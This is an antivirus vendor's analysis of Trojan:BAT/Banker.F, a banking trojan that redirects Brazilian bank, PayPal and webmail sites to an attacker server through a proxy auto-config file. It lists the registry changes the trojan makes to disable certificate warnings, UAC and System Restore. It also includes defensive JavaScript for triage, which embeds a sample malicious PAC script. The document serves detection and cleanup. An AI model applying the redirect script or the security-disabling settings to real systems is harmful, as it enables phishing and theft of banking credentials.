
Trojan:BAT/Banker.F


First posted on 03 August 2012.
Source: Microsoft

Aliases :

Trojan:BAT/Banker.F is also known as TR/Banker.F.1 (Avira), Trojan.Banker!WBNp3+aokMk (VirusBuster), Trojan-Banker.BAT.Banker.k (Kaspersky), TSPY_BANKER.JWE (Trend Micro), W32/Banker2.QG (Command).

Explanation :



Trojan:BAT/Banker.F is a trojan that hijacks your web browser's configuration so that attempts to reach certain banking, payment and webmail websites are routed to an attacker-controlled server hosting malicious pages that attempt to steal, or "phish", your information.

To accomplish this, Trojan:BAT/Banker.F modifies system and browser settings that may leave your computer unsecured.



Installation

When executed, Trojan:BAT/Banker.F copies itself as "AxUpdateMS.exe" into the %TEMP% folder.

It also drops a TXT (plain text) file, "KB_<computer name>_.txt", into the %TEMP% folder. This TXT file holds the Internet Explorer configuration script that implements the malware's website-redirection payload; it is wired in through the AutoConfigUrl setting described under "Modifies browser settings" below.



Note: %TEMP% refers to a variable location that is determined by the malware by querying the operating system. The default installation location for the Temporary Files folder for Windows 2000, XP, and 2003 is "C:\DOCUME~1\<user>\LOCALS~1\Temp". For Windows Vista and 7, the default location is "C:\Users\<user name>\AppData\Local\Temp".

The malware creates the following registry entry so that it can automatically run at each Windows start:

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Sets value: "ActiveX Update"
With data: "%TEMP%\AxUpdateMS.exe"



Payload

Redirects websites

Trojan:BAT/Banker.F may redirect requests for the following legitimate websites to the attacker-controlled address "200.98.132.144" for phishing and/or information-stealing activities:

  • americanexpress.com.br
  • americanexpress.com
  • bancoamazonia.com.br
  • bancobrasil.com.br
  • bancodobrasil.com.br
  • banese.com.br
  • banespa.com.br
  • bb.b.br
  • bb.com.br
  • bradesco.b.br
  • bradesco.com.br
  • bradescopessoajuridica.b.br
  • bradescopessoajuridica.com.br
  • bradescoprime.com.br
  • citibank.com.br
  • gmail.com.br
  • gmail.com
  • hotmail.com.br
  • hotmail.com
  • hsbc.com.br
  • itau.b.br
  • itau.com.br
  • itaupersonnalite.com.br
  • paypal.com.br
  • paypal.com
  • safranet.com.br
  • safraprivate.com.br
  • santander.com.br
  • santanderempresarial.com.br
  • serasa.com.br
  • serasaexperian.com.br


Modifies browser settings

Trojan:BAT/Banker.F modifies browser settings that assist it in its malicious activity by making a number of registry modifications.

It disables the warning Internet Explorer shows when a website presents an invalid, expired or untrusted security certificate, which would otherwise alert you when a redirected HTTPS page is served by the attacker's server instead of the real site:

In subkey: HKU\<local_SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "WarnonBadCertRecving"
With data: "0"

Note: <local_SID> is a variable that refers to your "security identifier", which is a unique alphanumeric code that your computer uses to identify you, similar to your user name.

It turns off automatic detection of the intranet network, so that which websites fall into the Local intranet zone (a zone with less restrictive security settings than the Internet zone) is governed only by the explicit zone rules, which the attacker can then define:

In subkey: HKU\<local_SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Sets value: "AutoDetect"
With data: "0"

It disables notifications that you are visiting intranet-zone websites:

In subkey: HKU\<local_SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "WarnOnIntranet"
With data: "0"

It disables the ability to restore your home page and search sites to their defaults:

In subkey: HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "ResetWebSettings"
With data: "1"

In subkey: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "ResetWebSettings"
With data: "1"

It locks the Automatic configuration settings (reached through the Connections tab of the Internet Options window) so that you cannot change or remove the configuration file Internet Explorer is told to use:

In subkey: HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "Autoconfig"
With data: "1"

In subkey: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "Autoconfig"
With data: "1"

It sets the automatic configuration script URL (AutoConfigUrl) to the dropped file, so that Internet Explorer loads that file as its proxy auto-configuration script and consults it for every request; this is the mechanism behind the website redirection described above:

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "AutoConfigUrl"
With data: "%TEMP%\KB_<computer name>_.txt"

In subkey: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "AutoConfigUrl"
With data: "%TEMP%\KB_<computer name>_.txt"
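A file loaded through AutoConfigUrl is evaluated by the browser as a proxy auto-config (PAC) script, which is JavaScript exposing a FindProxyForURL(url, host) function; whatever the file extension, returning "PROXY <address>" for a host sends that host's traffic to the attacker's server. The following triage script, an added example that is not part of the original analysis, evaluates such a script offline and reports which hosts it does not send DIRECT. The PAC text embedded in it is constructed for the example to mimic the behaviour described on this page (the real KB_<computer name>_.txt is not reproduced here); the domain list and the 200.98.132.144 address are taken from the page, and the helper names dnsDomainIs, shExpMatch and isPlainHostName are the standard PAC built-ins re-implemented minimally.

```javascript
// Offline evaluator for a suspicious proxy auto-config (PAC) script, such as
// the file Trojan:BAT/Banker.F registers through AutoConfigUrl. Added example;
// not code from the page's analysis.

// CONSTRUCTED sample PAC text that mimics the described behaviour. The real
// dropped file is not reproduced on the page; only the 200.98.132.144 address
// and the domain names below come from the page.
const SAMPLE_PAC = `
var targets = ["bradesco.com.br", "itau.com.br", "paypal.com", "gmail.com"];
function FindProxyForURL(url, host) {
  for (var i = 0; i < targets.length; i++) {
    if (host == targets[i] || dnsDomainIs(host, "." + targets[i])) {
      return "PROXY 200.98.132.144:80";
    }
  }
  return "DIRECT";
}
`;

// Minimal re-implementation of the PAC built-ins the script may call.
function dnsDomainIs(host, domain) {
  return host.length >= domain.length &&
         host.slice(host.length - domain.length) === domain;
}
function isPlainHostName(host) {
  return !host.includes(".");
}
function shExpMatch(str, shexp) {
  // Shell glob -> anchored regex: escape metacharacters, then * -> .* and ? -> .
  const re = "^" + shexp.replace(/[.+^${}()|[\]\\]/g, "\\$&")
                        .replace(/\*/g, ".*")
                        .replace(/\?/g, ".") + "$";
  return new RegExp(re).test(str);
}

// Evaluate the script with only the helpers above passed in. `new Function`
// is NOT a security sandbox (the script can still reach globals), so only run
// this against attacker-supplied files on an isolated analysis machine.
function loadPac(pacText) {
  const factory = new Function("dnsDomainIs", "isPlainHostName", "shExpMatch",
    pacText + "\nreturn FindProxyForURL;");
  return factory(dnsDomainIs, isPlainHostName, shExpMatch);
}

// "PROXY a:80; SOCKS b:1080; DIRECT" -> ["a:80", "b:1080"]
function proxyTargets(verdict) {
  return verdict.split(";")
    .map(s => s.trim())
    .filter(s => /^(PROXY|SOCKS5?)\s+\S/i.test(s))
    .map(s => s.replace(/^\S+\s+/, ""));
}

// Map each host that the PAC does not send DIRECT to its proxy target(s).
function triagePac(pacText, hosts) {
  const findProxyForURL = loadPac(pacText);
  const hijacked = {};
  for (const host of hosts) {
    // The browser calls FindProxyForURL(url, host); the host drives the decision here.
    const verdict = String(findProxyForURL("https://" + host + "/", host));
    const targets = proxyTargets(verdict);
    if (targets.length > 0) hijacked[host] = targets;
  }
  return hijacked;
}

// Hosts to probe: some from the page's list plus controls that must stay DIRECT.
const SAMPLE_HOSTS = ["www.bradesco.com.br", "itau.com.br", "www.paypal.com",
                      "gmail.com", "notpaypal.com", "mail.google.com",
                      "www.microsoft.com"];

console.log(JSON.stringify(triagePac(SAMPLE_PAC, SAMPLE_HOSTS), null, 2));
```

Run with the suspect file's contents in place of SAMPLE_PAC; every host the output lists is one the browser would silently send through the listed proxy, and with WarnonBadCertRecving set to 0 as described above, even HTTPS requests to those hosts would produce no certificate warning.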

It ensures that Internet Explorer uses the HTTP 1.1 standard, possibly to ensure sites that you are redirected to are displayed properly on your computer:

In subkey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "EnableHttp1_1"
With data: "1"

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "EnableHttp1_1"
With data: "1"

It turns off any manually configured proxy server for LAN connections, so that proxy selection is left entirely to the automatic configuration script, and it clears the "Use HTTP 1.1 through proxy connections" option (a data value of "0" disables it):

In subkey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "ProxyEnable"
With data: "0"

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "ProxyEnable"
With data: "0"

In subkey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "ProxyHttp1.1"
With data: "0"

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "ProxyHttp1.1"
With data: "0"

It hides the Advanced tab in the Internet Explorer options window:

In subkey: HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "AdvancedTab"
With data: "1"

In subkey: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "AdvancedTab"
With data: "1"

Modifies system settings

Trojan:BAT/Banker.F also modifies system settings to prevent system restore, so that you cannot revert to a previous, uninfected state of Windows, by modifying the following registry entry:

In subkey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Sets value: "DisableSR"
With data: "1"

Trojan:BAT/Banker.F disables the LUA (Least Privileged User Account), also known as the "administrator in Admin Approval Mode" user type, by making the following registry modification:

In subkey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Sets value: "EnableLUA"
With data: "0"


Note: Disabling the LUA turns off User Account Control, so programs run by an administrator account receive full administrative privileges by default, without prompting you for explicit consent. The value that User Account Control actually honours is EnableLUA under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and a change to it takes effect only after a restart; when checking a system, inspect that location as well as the HKCU key listed above.
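The browser-settings and system-settings changes above, together with the "ActiveX Update" autorun entry, can be checked for offline against a Registry Editor export of the affected hives. The script below is an added example, not part of the original analysis: it parses a .reg export (string and dword values), folds per-user HKEY_USERS\<SID> paths onto HKCU so the page's HKU\<local_SID> entries line up, and reports the entries that match the values listed on this page. ProxyEnable=0 and EnableHttp1_1=1 are ordinary defaults on most machines and are deliberately not used as indicators. The sample export embedded in it is constructed for the example; the user name, computer name and the benign "ExampleUpdater" entry are invented.

```javascript
// Scan a Registry Editor (.reg) export for the Trojan:BAT/Banker.F settings
// listed on this page. Added example, not part of the original analysis.
// Real exports are UTF-16LE text: decode them before passing the string in.

// CONSTRUCTED sample export, assumed to come from an infected Windows 7 host
// (user name, computer name and the "ExampleUpdater" entry are invented).
const SAMPLE_REG = String.raw`Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ActiveX Update"="C:\\Users\\alice\\AppData\\Local\\Temp\\AxUpdateMS.exe"
"ExampleUpdater"="C:\\Program Files\\Example\\updater.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnonBadCertRecving"=dword:00000000
"ProxyEnable"=dword:00000000
"EnableHttp1_1"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigUrl"="C:\\Users\\alice\\AppData\\Local\\Temp\\KB_WORKSTATION7_.txt"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR"=dword:00000001
`;

const HIVES = { HKEY_LOCAL_MACHINE: "HKLM", HKEY_CURRENT_USER: "HKCU", HKEY_USERS: "HKU" };

// Canonical key form: short hive name, per-user SID subtree folded to HKCU, lower case.
function normalizeKey(key) {
  let k = key.replace(/^[A-Z_]+/, h => HIVES[h] || h);
  k = k.replace(/^HKU\\S-1-[0-9-]+\\/i, "HKCU\\");
  return k.toLowerCase();
}

// .reg string syntax escapes backslash and double quote with a backslash.
function unescapeRegString(s) {
  return s.replace(/\\(["\\])/g, "$1");
}

// Returns [{ key, name, type, data }] for every value line in the export.
function parseRegExport(text) {
  const entries = [];
  let key = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith(";") || /^(Windows Registry Editor|REGEDIT4)/.test(line)) continue;
    const section = line.match(/^\[(.+)\]$/);
    if (section) { key = normalizeKey(section[1]); continue; }
    const m = line.match(/^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$/);
    if (!m || key === null) continue;            // hex: continuation lines etc. are skipped
    const name = m[1] === undefined ? "" : unescapeRegString(m[1]);
    const value = m[2];
    let entry = { key, name: name.toLowerCase(), type: "other", data: value };
    if (/^dword:[0-9a-f]{8}$/i.test(value)) {
      entry = { ...entry, type: "dword", data: parseInt(value.slice(6), 16) };
    } else if (/^".*"$/.test(value)) {
      entry = { ...entry, type: "string", data: unescapeRegString(value.slice(1, -1)) };
    }
    entries.push(entry);
  }
  return entries;
}

// Indicator table taken from the page. `expect` is a dword value or a RegExp on string data.
const IS = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings";
const IEPOL = "SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel";
const both = (subkey, name, expect, why) =>
  ["HKCU", "HKLM"].map(h => ({ key: `${h}\\${subkey}`, name, expect, why }));
const INDICATORS = [
  { key: "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", name: "ActiveX Update",
    expect: /AxUpdateMS\.exe$/i, why: "autorun entry for the copy dropped in %TEMP%" },
  { key: `HKCU\\${IS}`, name: "WarnonBadCertRecving", expect: 0, why: "certificate warnings suppressed" },
  { key: `HKCU\\${IS}\\ZoneMap`, name: "AutoDetect", expect: 0, why: "intranet auto-detection off" },
  { key: `HKCU\\${IS}`, name: "WarnOnIntranet", expect: 0, why: "intranet-zone warning off" },
  ...both(IEPOL, "ResetWebSettings", 1, "Reset Web Settings disabled"),
  ...both(IEPOL, "Autoconfig", 1, "automatic configuration settings locked"),
  { key: `HKLM\\${IS}`, name: "AutoConfigUrl", expect: /KB_.*_\.txt$/i, why: "PAC script points at dropped file" },
  { key: `HKLM\\${IEPOL}`, name: "AutoConfigUrl", expect: /KB_.*_\.txt$/i, why: "PAC script points at dropped file" },
  ...both(IEPOL, "AdvancedTab", 1, "Advanced tab hidden"),
  { key: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", name: "DisableSR",
    expect: 1, why: "System Restore disabled" },
  // HKCU is what the page lists; HKLM is the location UAC actually reads, so check both.
  ...both("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "EnableLUA", 0, "UAC disabled"),
];

// Returns the indicator matches found in the export, in indicator-table order.
function scanRegExport(text) {
  const entries = parseRegExport(text);
  const hits = [];
  for (const ind of INDICATORS) {
    const key = normalizeKey(ind.key), name = ind.name.toLowerCase();
    for (const e of entries) {
      if (e.key !== key || e.name !== name) continue;
      const matched = ind.expect instanceof RegExp
        ? e.type === "string" && ind.expect.test(e.data)
        : e.type === "dword" && e.data === ind.expect;
      if (matched) hits.push({ key: ind.key, name: ind.name, data: e.data, why: ind.why });
    }
  }
  return hits;
}

for (const h of scanRegExport(SAMPLE_REG)) console.log(`${h.key} :: ${h.name} = ${h.data}  (${h.why})`);
```

A hit on AutoConfigUrl should be followed by pulling the referenced file and evaluating it as a PAC script; the remaining hits are the settings to revert once the dropped executable and its Run entry have been removed.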



Analysis by Edgardo Diaz

Last update 03 August 2012
